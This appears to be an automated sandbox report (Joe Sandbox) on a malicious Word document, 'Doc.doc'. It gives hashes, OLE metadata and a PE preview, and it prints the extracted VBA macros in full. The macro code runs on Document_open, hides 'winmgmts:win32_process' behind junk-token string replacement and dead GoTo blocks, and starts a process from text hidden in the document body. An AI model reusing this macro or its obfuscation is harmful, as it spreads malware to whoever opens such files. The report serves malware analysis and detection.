Joe Sandbox View:	Filename: Informacion_4-09757.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J...X......uz.......`......................................................................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data....2..........................@....rsrc...............................@..@.reloc...#.......$..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Doc.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array, Author: Valentin Pierre, Template: Normal.dotm, Last Saved By: Alexandre Royer, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 16:46:00 2020, Last Saved Time/Date: Mon Dec 21 16:46:00 2020, Number of Pages: 1, Number of Words: 5823, Number of Characters: 33197, Security: 8
Entropy (8bit):	6.40369092724353
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	Doc.doc
File size:	206220
MD5:	16f391d60eff19aabb43225c85d5145c
SHA1:	58becf84bea5dafb9d46afc194a4eaf946fa4c72
SHA256:	af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
SHA512:	1f1bdb1e9ca6cad0f9136dbcd2189cbe5f35fdba085b84a883624b6908dde78950ab074b653de8b910d1975eb53ce2760d7af4a454a8d1186fcdf35a701aac2c
SSDEEP:	3072:fY9ufstRUUKSns8T00JSHUgteMJ8qMD7gZN1oPXWS9BOO90u/i6j3N:fY9ufsfgIf0pL+GS9BOO90u/i6j3N
File Content Preview:	........................>.......................8...........;...............5...6...7..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Doc.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	fuchsia Health & Industrial copying PNG National Handcrafted Plastic Towels utilize Baby & Grocery interface array
Author:	Valentin Pierre
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Alexandre Royer
Revion Number:	1
Total Edit Time:	0
Create Time:	2020-12-21 16:46:00
Last Saved Time:	2020-12-21 16:46:00
Number of Pages:	1
Number of Words:	5823
Number of Characters:	33197
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	1252
Number of Lines:	276
Number of Paragraphs:	77
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: UserForm1, Stream Size: -1

General
Stream Path:	Macros/UserForm1
VBA File Name:	UserForm1
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E77D524C-45E0-4303-8950-534590AD4DEB}{E77862AF-692B-4B7B-BD16-0410B9AB2400}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	Macros/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4550ECA8-53EF-42AC-93D5-0CA903578709}{72C9C4EB-10A3-4885-BA80-C0FBFED082ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm3, Stream Size: -1

General
Stream Path:	Macros/UserForm3
VBA File Name:	UserForm3
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_Base
VB_Customizable
VB_TemplateDerived
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{8D32BC7D-8238-4012-A57F-F52417AD215A}{35592C14-5CE4-40FF-A081-FD92234D203F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm4, Stream Size: -1

General
Stream Path:	Macros/UserForm4
VBA File Name:	UserForm4
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{7EF12E23-BE33-47E8-84D1-A0E2D10D9A4F}{37B9FED0-64EA-4D5B-873E-97F62B7888F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm5, Stream Size: -1

General
Stream Path:	Macros/UserForm5
VBA File Name:	UserForm5
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{60066BD8-8410-49CE-BA0A-DC27DC5BE897}{C9E7B34F-93A6-467E-B3A3-50233873FCED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: L6bihtdtnasc, Stream Size: 681

General
Stream Path:	Macros/VBA/L6bihtdtnasc
VBA File Name:	L6bihtdtnasc
Stream Size:	681
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . S . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 53 8f ed 7d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "L6bihtdtnasc"`

VBA File Name: Qfepbztq9r8o1l76, Stream Size: 16867

General
Stream Path:	Macros/VBA/Qfepbztq9r8o1l76
VBA File Name:	Qfepbztq9r8o1l76
Stream Size:	16867
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 0f 30 00 00 00 00 00 00 01 00 00 00 53 8f f0 d9 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
xaeBOIr
QokjF
RmtjCU:
ftFiaG
VBA.Replace
"hzJiH.sMeEIQHFY.gexKUGUI"
OGQTPEH
lvaOGgAa
szYhABIf
MacHEivy:
"SIYsHYJ.szjuc.RoiPd"
rHCZjEw:
tbIDBxAIB:
IdHEFHG
BQvbJ
UMafav
Rwjxp:
wMbuCy
jvyTJ:
"IqlrqA.vtwEIm.lETEIJA"
pIPwEU
"PJdCYHGDx.xMcac.TuKMx"
pHvmE:
rrzVQC
DVIODFG
CFoGN:
"fJnkNjH.nGdvFGC.zkPVeOFC"
Rwjxp
qoqOYAnKJ
XgcnJVEG
Binary
HGRHh
"KlTTDXhW.iidsEDJqa.QyLHeCE"
dkidmfe:
"ihoEED.PDrskFBA.bJbNF"
"TtYIGDY.tYlIB.IXupzJHD"
Uzngzb:
"PuasnADG.cAXTGAN.sUXKFmjG"
"atyQEDH.RWyVArHAB.pVvDpHEuD"
FfUdDPm
qoqOYAnKJ:
"cHBGAIHG.cFpJGIJl.vbUoN"
ftFiaG:
natkhGFQD
RmtjCU
uTaPAIGNH
"DlzhGE.NKfSJqpcH.SjmcJJBJJ"
"TemfXF.bfMha.jnRqFK"
slPRBMFEB
XytRGbWWR:
"MyIuIGxxD.VpYVAPIw.iMbgAEuc"
"wLTBZpoB.cMFiJ.phmHGHlJI"
RlXsHI:
mMDIBBGH
FMrcDEFEQ
psnrIHICY:
XgcnJVEG:
jTeLG:
jLvyJe
daVOIQkE
yUhrXM
kloRF
"jyHqihfKA.HgOuAh.cuXjB"
Resume
oSyUH:
tbIDBxAIB
OdtXGe:
bKRLCqR:
aiqHJw
"vQgTUNiC.nBxYKHe.euwNI"
StHrFBBI
yffJdpMFE
ErRsBJD:
nYVDF:
"XxmzEU.DyPyOF.GnJMGdHHU"
"jDyAHIGsG.AovRB.OpXLjg"
"YYaOCJyF.hdZxD.qyepAED"
uKlZBM:
dOVxshsCI
HGRHh:
"FRqFHc.GehTAIFeH.hjCZI"
Uzngzb
uoFsgOnl:
ChrW(wdKeyS)
nYVDF
"GBOjolD.psdHCIh.HuOuBFiwJ"
aNLAA:
FfUdDPm:
TrEWGLLVF
lBpiLIQXL
"nSjSfx.APeET.VNDhZIFF"
RGWBBRDVD
aMkVd
LeiBYFBA
"noFGAFvHG.kPRnsl.iUayAGGJ"
DhJcAB
"xWUqJ.yvIzE.lOPJGBIID"
QuDJB
zwuglCFsC:
"zZudKI.oKzyJHE.mICJqCLW"
rrzVQC:
MGNTHC
"hbDlwlQJE.qsCgEh.gJUPEC"
MJenEIFhH:
shBWyQG
VB_Name
TrEWGLLVF:
xLdgAFZA
DobhmY:
IYLpCJ:
ErRsBJD
RlXsHI
"XLYdgIG.gQzexpZZ.RhwWu"
SWDkIFtR
kQkqMq
"SiPdpA.jcGoGFZG.ZFwWf"
jSyHcJYnj
zbWDKmIB
"GCWzCzxj.EBrCIIlA.lFKuCCPB"
LPluFEHD
DVIODFG:
FMrcDEFEQ:
NfmoCHe
MJenEIFhH
zwuglCFsC
BcjsHnEg
bqloIAW:
"LVNMDIBAF.xsRQCZg.LUmCCICh"
UYDdxBQA
XDsudqEDb
"DdVxFIBEH.DhxsFC.oiBeEZBI"
wACNy
"mUzmj.DGYhPmFUM.FjtHqCA"
fgHICJHJ
mQgRQJCTI
LPluFEHD:
"RatqHEg.BQzvFHj.DPRWAZfCV"
IYLpCJ
"IQTLdE.FEpPmy.IHdOCgSB"
jCzixXAB
fgHICJHJ:
QuDJB:
gsCwnX
psnrIHICY
hDtiCc
"lVppvD.wgJNDzCy.gLKXd"
"eRlbAHDf.VXIsV.yVVaFD"
jvyTJ
bqloIAW
"gDQhOr.AdtYHAyCC.QdPVFH"
IdHEFHG:
"IhtjJG.WtfQBcbC.TNiPT"
kSctB
dkidmfe
FOjwlJ
NwkUz
qarxACNqv
daVOIQkE:
"SlGmA.VBVZECsNI.vtRtHG"
"kpKDCAObU.IvFrXHGJP.NZDXABTE"
pHvmE
xJNGw
aNLAA
tJBtVVy
Function
iAPcH
DkKDCCGD
uhOGZf
WMQzHDM
lICRFJ:
rNlIgDGG:
BQvbJ:
kSctB:
XDsudqEDb:
rHCZjEw
rNlIgDGG
lICRFJ
uKlZBM
"fQjsm.gYjzDADu.uLEQDCB"
"ZgugNT.fyNMD.sGSsb"
rLjMqJC
rPTbFNpIg
"NwDyjJHj.sGvCc.zUWPZDN"
CFoGN
"FtLdBBFt.TgcFADq.QKdzF"
String
MacHEivy
TAYfnygFI
DhJcAB:
yYtBFhh:
mQgRQJCTI:
oSyUH
qarxACNqv:
"Cyabs.OCfwHDf.gOFzDG"
TVKeFhHT
pRVuBH
dHHCYIX
OdtXGe
rLjMqJC:
hDtiCc:
xJNGw:
yYtBFhh
"wWbKMTCsB.TfYnablxs.EKZtUghe"
XytRGbWWR
IyiwBHG
HHrDJ
jTeLG
Error
Enpewjzyrpx()
Attribute
"DhFqOHHFH.LWgNFDF.xxbwQDD"
Close
dSxaFFFR
"ugVrJFm.YuthuIJ.ckCqK"
uoFsgOnl
"PuLhbH.VgtBGDc.mMkjrBBF"
"bsYyG.zoiSBCHJ.dLLbHJeCm"
IQtEqBGHB
etMoIHJ
DobhmY
JXfJku
"NrQDg.kdwxHDRVG.YuMDH"
shBWyQG:
xISbD
"spaJuD.hyjRQhJ.zAAqzHBB"
"WdQWH.qAFZlDnI.EPZlJJDnD"
bKRLCqR

VBA Code

Attribute VB_Name = "Qfepbztq9r8o1l76"
    Function Oyfrd5_ht_rhw(K33st6ruq1aaq)
   GoTo TrEWGLLVF
Dim MGNTHC As String
Open "IQTLdE.FEpPmy.IHdOCgSB" For Binary As 185
Put #185, , MGNTHC
Close #185
TrEWGLLVF:
GoTo DobhmY
Dim DkKDCCGD As String
Open "spaJuD.hyjRQhJ.zAAqzHBB" For Binary As 196
Put #196, , DkKDCCGD
Close #196
DobhmY:
GoTo MJenEIFhH
Dim mMDIBBGH As String
Open "mUzmj.DGYhPmFUM.FjtHqCA" For Binary As 126
Put #126, , mMDIBBGH
Close #126
MJenEIFhH:
Oyfrd5_ht_rhw = VBA.Replace (K33st6ruq1aaq, "J" + ")(3" + "s2)" + "(", Dxkc08p3mbht)
   GoTo HGRHh
Dim NwkUz As String
Open "TemfXF.bfMha.jnRqFK" For Binary As 159
Put #159, , NwkUz
Close #159
HGRHh:
GoTo nYVDF
Dim JXfJku As String
Open "hzJiH.sMeEIQHFY.gexKUGUI" For Binary As 113
Put #113, , JXfJku
Close #113
nYVDF:
GoTo bqloIAW
Dim gsCwnX As String
Open "nSjSfx.APeET.VNDhZIFF" For Binary As 131
Put #131, , gsCwnX
Close #131
bqloIAW:
End Function
Function Enpewjzyrpx()
On Error Resume Next
mn2b = R4bm01nsbtdt1.StoryRanges.Item(1)
   GoTo FfUdDPm
Dim SWDkIFtR As String
Open "GCWzCzxj.EBrCIIlA.lFKuCCPB" For Binary As 106
Put #106, , SWDkIFtR
Close #106
FfUdDPm:
GoTo pHvmE
Dim xLdgAFZA As String
Open "cHBGAIHG.cFpJGIJl.vbUoN" For Binary As 114
Put #114, , xLdgAFZA
Close #114
pHvmE:
GoTo XDsudqEDb
Dim yUhrXM As String
Open "KlTTDXhW.iidsEDJqa.QyLHeCE" For Binary As 166
Put #166, , yUhrXM
Close #166
XDsudqEDb:
mwb2 = "J)(3s2)(pJ)(3s2)("
Slz7zz5j6il37ysy5 = "J)(3" + "s2)(roJ)(3s2" + ")(J)(3s2)(ceJ)(3s2" + ")(sJ)(3s2)(sJ)(3s" + "2)(J)(3s2)("
   GoTo ErRsBJD
Dim jLvyJe As String
Open "YYaOCJyF.hdZxD.qyepAED" For Binary As 164
Put #164, , jLvyJe
Close #164
ErRsBJD:
GoTo DVIODFG
Dim etMoIHJ As String
Open "kpKDCAObU.IvFrXHGJP.NZDXABTE" For Binary As 164
Put #164, , etMoIHJ
Close #164
DVIODFG:
GoTo LPluFEHD
Dim jSyHcJYnj As String
Open "MyIuIGxxD.VpYVAPIw.iMbgAEuc" For Binary As 69
Put #69, , jSyHcJYnj
Close #69
LPluFEHD:
G4ji3ni5oag5hr0bs = "J)(3s2)(" + ":wJ)(3s2)(J)(3s" + "2)(inJ)(3s2)(3J)(" + "3s2)(2J)(3s2)(_J)(3s2)("
   GoTo mQgRQJCTI
Dim TAYfnygFI As String
Open "PuLhbH.VgtBGDc.mMkjrBBF" For Binary As 180
Put #180, , TAYfnygFI
Close #180
mQgRQJCTI:
GoTo CFoGN
Dim aiqHJw As String
Open "FtLdBBFt.TgcFADq.QKdzF" For Binary As 233
Put #233, , aiqHJw
Close #233
CFoGN:
GoTo jTeLG
Dim dSxaFFFR As String
Open "SiPdpA.jcGoGFZG.ZFwWf" For Binary As 187
Put #187, , dSxaFFFR
Close #187
jTeLG:
Q1cm_khzbg8qv4fsm = "wJ)(3s2)(i" + "nJ)(3s2)(mJ)(3s2)(gmJ)(3" + "s2)(tJ)(3s2)(J)(3s2)("
   GoTo DhJcAB
Dim IQtEqBGHB As String
Open "DdVxFIBEH.DhxsFC.oiBeEZBI" For Binary As 139
Put #139, , IQtEqBGHB
Close #139
DhJcAB:
GoTo IdHEFHG
Dim zbWDKmIB As String
Open "atyQEDH.RWyVArHAB.pVvDpHEuD" For Binary As 70
Put #70, , zbWDKmIB
Close #70
IdHEFHG:
GoTo XgcnJVEG
Dim rPTbFNpIg As String
Open "Cyabs.OCfwHDf.gOFzDG" For Binary As 81
Put #81, , rPTbFNpIg
Close #81
XgcnJVEG:
L13qv_7n6p_ = ChrW(wdKeyS)
   GoTo RlXsHI
Dim dHHCYIX As String
Open "vQgTUNiC.nBxYKHe.euwNI" For Binary As 217
Put #217, , dHHCYIX
Close #217
RlXsHI:
GoTo Rwjxp
Dim HHrDJ As String
Open "SlGmA.VBVZECsNI.vtRtHG" For Binary As 105
Put #105, , HHrDJ
Close #105
Rwjxp:
GoTo uoFsgOnl
Dim yffJdpMFE As String
Open "xWUqJ.yvIzE.lOPJGBIID" For Binary As 108
Put #108, , yffJdpMFE
Close #108
uoFsgOnl:
Q7oow2jcixygjgq4n = Q1cm_khzbg8qv4fsm + L13qv_7n6p_ + G4ji3ni5oag5hr0bs + mwb2 + Slz7zz5j6il37ysy5
   GoTo OdtXGe
Dim xaeBOIr As String
Open "lVppvD.wgJNDzCy.gLKXd" For Binary As 247
Put #247, , xaeBOIr
Close #247
OdtXGe:
GoTo uKlZBM
Dim wACNy As String
Open "NwDyjJHj.sGvCc.zUWPZDN" For Binary As 158
Put #158, , wACNy
Close #158
uKlZBM:
GoTo zwuglCFsC
Dim StHrFBBI As String
Open "fJnkNjH.nGdvFGC.zkPVeOFC" For Binary As 194
Put #194, , StHrFBBI
Close #194
zwuglCFsC:
Eagl57d2fbt00xsd = Lala28ia3bsrs_njr8(Q7oow2jcixygjgq4n)
   GoTo aNLAA
Dim lvaOGgAa As String
Open "NrQDg.kdwxHDRVG.YuMDH" For Binary As 140
Put #140, , lvaOGgAa
Close #140
aNLAA:
GoTo qoqOYAnKJ
Dim pRVuBH As String
Open "XLYdgIG.gQzexpZZ.RhwWu" For Binary As 71
Put #71, , pRVuBH
Close #71
qoqOYAnKJ:
GoTo lICRFJ
Dim wMbuCy As String
Open "noFGAFvHG.kPRnsl.iUayAGGJ" For Binary As 153
Put #153, , wMbuCy
Close #153
lICRFJ:
Set Che810bmyytv7es3 = CreateObject(Eagl57d2fbt00xsd)
   GoTo BQvbJ
Dim uTaPAIGNH As String
Open "hbDlwlQJE.qsCgEh.gJUPEC" For Binary As 222
Put #222, , uTaPAIGNH
Close #222
BQvbJ:
GoTo Uzngzb
Dim FOjwlJ As String
Open "bsYyG.zoiSBCHJ.dLLbHJeCm" For Binary As 66
Put #66, , FOjwlJ
Close #66
Uzngzb:
GoTo XytRGbWWR
Dim TVKeFhHT As String
Open "XxmzEU.DyPyOF.GnJMGdHHU" For Binary As 135
Put #135, , TVKeFhHT
Close #135
XytRGbWWR:
Op0zef7hsi0prtkn4 = Mid(mn2b, (5), Len(mn2b))
   GoTo bKRLCqR
Dim IyiwBHG As String
Open "WdQWH.qAFZlDnI.EPZlJJDnD" For Binary As 198
Put #198, , IyiwBHG
Close #198
bKRLCqR:
GoTo shBWyQG
Dim tJBtVVy As String
Open "ihoEED.PDrskFBA.bJbNF" For Binary As 230
Put #230, , tJBtVVy
Close #230
shBWyQG:
GoTo fgHICJHJ
Dim NfmoCHe As String
Open "ugVrJFm.YuthuIJ.ckCqK" For Binary As 210
Put #210, , NfmoCHe
Close #210
fgHICJHJ:
   GoTo rNlIgDGG
Dim kQkqMq As String
Open "zZudKI.oKzyJHE.mICJqCLW" For Binary As 82
Put #82, , kQkqMq
Close #82
rNlIgDGG:
GoTo MacHEivy
Dim UYDdxBQA As String
Open "gDQhOr.AdtYHAyCC.QdPVFH" For Binary As 167
Put #167, , UYDdxBQA
Close #167
MacHEivy:
GoTo psnrIHICY
Dim jCzixXAB As String
Open "IqlrqA.vtwEIm.lETEIJA" For Binary As 95
Put #95, , jCzixXAB
Close #95
psnrIHICY:
Che810bmyytv7es3.Create Lala28ia3bsrs_njr8(Op0zef7hsi0prtkn4), Ud9_lppkb568bn7, Tt2eddizxwvf
   GoTo QuDJB
Dim natkhGFQD As String
Open "GBOjolD.psdHCIh.HuOuBFiwJ" For Binary As 178
Put #178, , natkhGFQD
Close #178
QuDJB:
GoTo ftFiaG
Dim iAPcH As String
Open "wWbKMTCsB.TfYnablxs.EKZtUghe" For Binary As 78
Put #78, , iAPcH
Close #78
ftFiaG:
GoTo dkidmfe
Dim lBpiLIQXL As String
Open "wLTBZpoB.cMFiJ.phmHGHlJI" For Binary As 116
Put #116, , lBpiLIQXL
Close #116
dkidmfe:
   GoTo rLjMqJC
Dim BcjsHnEg As String
Open "jyHqihfKA.HgOuAh.cuXjB" For Binary As 109
Put #109, , BcjsHnEg
Close #109
rLjMqJC:
GoTo IYLpCJ
Dim szYhABIf As String
Open "eRlbAHDf.VXIsV.yVVaFD" For Binary As 100
Put #100, , szYhABIf
Close #100
IYLpCJ:
GoTo RmtjCU
Dim WMQzHDM As String
Open "IhtjJG.WtfQBcbC.TNiPT" For Binary As 188
Put #188, , WMQzHDM
Close #188
RmtjCU:
End Function
Function Lala28ia3bsrs_njr8(Orlzdb51qrb9)
On Error Resume Next
   GoTo rHCZjEw
Dim slPRBMFEB As String
Open "DhFqOHHFH.LWgNFDF.xxbwQDD" For Binary As 101
Put #101, , slPRBMFEB
Close #101
rHCZjEw:
GoTo daVOIQkE
Dim uhOGZf As String
Open "FRqFHc.GehTAIFeH.hjCZI" For Binary As 186
Put #186, , uhOGZf
Close #186
daVOIQkE:
GoTo tbIDBxAIB
Dim QokjF As String
Open "SIYsHYJ.szjuc.RoiPd" For Binary As 60
Put #60, , QokjF
Close #60
tbIDBxAIB:
Xyzanni2197 = (Orlzdb51qrb9)
   GoTo kSctB
Dim dOVxshsCI As String
Open "PJdCYHGDx.xMcac.TuKMx" For Binary As 163
Put #163, , dOVxshsCI
Close #163
kSctB:
GoTo hDtiCc
Dim kloRF As String
Open "ZgugNT.fyNMD.sGSsb" For Binary As 138
Put #138, , kloRF
Close #138
hDtiCc:
GoTo qarxACNqv
Dim OGQTPEH As String
Open "fQjsm.gYjzDADu.uLEQDCB" For Binary As 140
Put #140, , OGQTPEH
Close #140
qarxACNqv:
Vfop753cj7535cxqmw = Oyfrd5_ht_rhw(Xyzanni2197)
   GoTo jvyTJ
Dim xISbD As String
Open "jDyAHIGsG.AovRB.OpXLjg" For Binary As 219
Put #219, , xISbD
Close #219
jvyTJ:
GoTo xJNGw
Dim aMkVd As String
Open "LVNMDIBAF.xsRQCZg.LUmCCICh" For Binary As 202
Put #202, , aMkVd
Close #202
xJNGw:
GoTo oSyUH
Dim pIPwEU As String
Open "PuasnADG.cAXTGAN.sUXKFmjG" For Binary As 197
Put #197, , pIPwEU
Close #197
oSyUH:
Lala28ia3bsrs_njr8 = Vfop753cj7535cxqmw
   GoTo FMrcDEFEQ
Dim RGWBBRDVD As String
Open "TtYIGDY.tYlIB.IXupzJHD" For Binary As 129
Put #129, , RGWBBRDVD
Close #129
FMrcDEFEQ:
GoTo yYtBFhh
Dim LeiBYFBA As String
Open "DlzhGE.NKfSJqpcH.SjmcJJBJJ" For Binary As 73
Put #73, , LeiBYFBA
Close #73
yYtBFhh:
GoTo rrzVQC
Dim UMafav As String
Open "RatqHEg.BQzvFHj.DPRWAZfCV" For Binary As 110
Put #110, , UMafav
Close #110
rrzVQC:
End Function

VBA File Name: R4bm01nsbtdt1, Stream Size: 1106

General
Stream Path:	Macros/VBA/R4bm01nsbtdt1
VBA File Name:	R4bm01nsbtdt1
Stream Size:	1106
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 53 8f 9c d6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Enpewjzyrpx
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "R4bm01nsbtdt1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Enpewjzyrpx
End Sub

VBA File Name: UserForm1, Stream Size: 1158

General
Stream Path:	Macros/VBA/UserForm1
VBA File Name:	UserForm1
Stream Size:	1158
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f d3 a7 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
